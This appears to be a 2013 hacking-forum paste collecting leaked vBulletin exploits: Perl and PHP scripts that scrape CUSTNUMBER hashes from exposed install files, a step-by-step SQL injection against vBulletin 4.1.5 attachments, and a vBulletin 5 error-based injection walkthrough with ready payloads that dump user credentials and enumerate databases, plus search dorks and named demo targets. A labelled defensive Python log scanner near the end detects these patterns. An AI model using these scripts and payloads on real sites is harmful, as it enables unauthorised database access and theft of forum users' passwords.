leaked by the injector

a guest
Mar 21st, 2013
vBulletin x.x.x Customer Area 0day
-------------------------------------------------
The Perl script got leaked, so I decided to post it here.

Code:
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
    print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
    exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search
{
    $url = $full_domain;
    $lwp = LWP::UserAgent->new();
    $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
    $request = $lwp->post($url, ["searchHash" => "Search"]);

    print " Searching $domain ----\n ";
    if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
    {
        print "Result : $1\n";
    } else {
        print "Hash: Hash not found!\n";
    }
}

php exploit -
--------------------

<?php
set_time_limit(0);

if($argc < 2) {
    echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
    exit;
}

$URL = $argv[1];
$arr = parse_url($URL);

### work with url
if(strpos($URL, '?')) die("Ohh, your URL is not valid");
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;

$headers = get_headers($URL . '/install/upgrade.php');
if(substr($headers[0], 9, 3) == '200') {
    $source = file_get_contents($URL . "/install/upgrade.php");
}
elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
    if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
}
else die("something went wrong...");

preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
    echo "Hash: " . $hash . PHP_EOL;
    $fp = fopen("hash.txt", "a+");
    fwrite($fp, $hash . PHP_EOL);
}
?>
------------------------------------------------------------------------
vbulletin 4.1.5 attachment SQLI

While examining variables I came across an SQL injection which, as it later turned out, is present in all vBulletin 4.1.5 installs.
Title: Vulnerability in vBulletin 4.1.5
Dork: Powered by vBulletin 4.1.5
Conditions: an account on the forum with permission to attach files to posts / threads (attachments).
Register -> go to the forum -> open a topic, or if the board has a CMS, create an article (the second option works better) -> at the bottom find Attachments -> 'Manage Attachments' -> in the window that opens, put the SQL query into the "values[f]" parameter. Example:

Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that we get vBulletin's standard "database error" page; opening the page source shows:

Code:
<!--
Database error in vBulletin 4.1.5 :

Invalid SQL :

SELECT
permissionsfrom , Hidden , setpublish , publishdate , userid
FROM ds23fSDdfsdf_cms_node
WHERE
nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );

MySQL Error : Duplicate column Name .1.49-3 '5 '
Error Number : 1060
Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33

Address : 127.0.0.1
Username : Hacker
Classname : vB_Database
MySQL Version :
-->

----------------------------------------------
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
******************************************************************
#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Homepage: hackyard.net
***********.com
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/
******************************************************************

-------------------------------------------------------------------
How to
-------------------------------------------------------------------

[#1] First of all, make an account on the vBulletin 5 forum,

http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------

[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)

http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------

[#3] Then click the Like button; you will see almost the same result as in the picture. Go to the first POST record, as shown below, and click the Replay button.

http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------

[#4] Then, under Send POST Content, use this:

-------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------

http://imageshack.us/a/img42/1590/26447606.png

// Note: keep the nodeid value as it is by default in the POST content, otherwise you will get an "invalid nodeid" error.
The SQLi payload above fetches the first record (username/password) from the user table.
-------------------------------------------------------------------

[#Other SQLi Syntaxes]

Version():
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

User():
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Database():
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Database Print:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Table Count:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Print Tables:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Columns of selected table:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Fetch Out Data:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

-------------------------------------------------------------------
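Added defender-side example, not part of the leaked scripts in this paste: a small Python scanner that runs over constructed web-server access-log lines and flags the two things the tools above depend on, requests that reach vBulletin's /install/ upgrade scripts (which are meant to be deleted after setup and are what the Perl/PHP scripts harvest CUSTNUMBER from) and the error-based MySQL signatures shared by every payload here (name_const() duplicate-column trick, floor(rand(0)*2) ... group by, SQL after values[f]=). The log lines, rule names and function names are assumptions for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not taken from the paste);
# IPs, paths and timestamps are made up for the demonstration.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2013:13:12:33 +0000] "GET /board/newattachment.php?do=assetmanager&values%5Bf%5D=-1599+or(1,2)%3D(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Feb/2013:13:14:01 +0000] "POST /forum/install/upgrade.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 Firefox/3.5.8"
10.0.0.9 - - [12/Feb/2013:13:15:10 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.3 - - [12/Feb/2013:13:16:45 +0000] "GET /forum/install/finalupgrade.php HTTP/1.1" 404 512 "-" "curl/7.29"
"""

# One combined-log line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# /install/ scripts should be gone after setup; the leaked tools read CUSTNUMBER from them.
INSTALL_RE = re.compile(r'/install/(upgrade|finalupgrade)\.php', re.I)
# The 4.1.5 attachment bug injects through the values[f] parameter.
VALUES_F_RE = re.compile(r'values\[f\]=', re.I)
SQL_TOKEN_RE = re.compile(r'\b(select|union|from|or|and)\b', re.I)
# Error-based MySQL signatures used by every payload on this page.
ERROR_BASED_RE = re.compile(r'floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by', re.I | re.S)
NAME_CONST_RE = re.compile(r'name_const\s*\(', re.I)


def classify_request(target, status):
    """Return the rule names (hypothetical rule set) triggered by one request target."""
    findings = []
    decoded = unquote_plus(target)  # normalise %5B, + and friends before matching
    if INSTALL_RE.search(decoded):
        # A 200 means the install script is still live and answering; anything else is a probe.
        findings.append("install_script_reachable" if status == 200 else "install_script_probe")
    m = VALUES_F_RE.search(decoded)
    if m and SQL_TOKEN_RE.search(decoded[m.end():]):
        findings.append("attachment_values_f_sqli")
    if ERROR_BASED_RE.search(decoded) or NAME_CONST_RE.search(decoded):
        findings.append("mysql_error_based_sqli")
    return findings


def scan_log(text):
    """Return (client_ip, rule, request_target) for every suspicious line in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in classify_request(m["target"], int(m["status"])):
            hits.append((m["ip"], rule, m["target"]))
    return hits


if __name__ == "__main__":
    for ip, rule, target in scan_log(SAMPLE_LOG):
        print(f"{ip:10} {rule:26} {target[:70]}")
```

The vBulletin 5 payload travels in a POST body, which an access log does not record, so for that case the same classify_request() would have to be fed request bodies from a WAF or application log.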
----------------------------------------------------

==[ That`s it!
==[ Thanks, 0x0A!
==[ Romania

----------------------------------------------------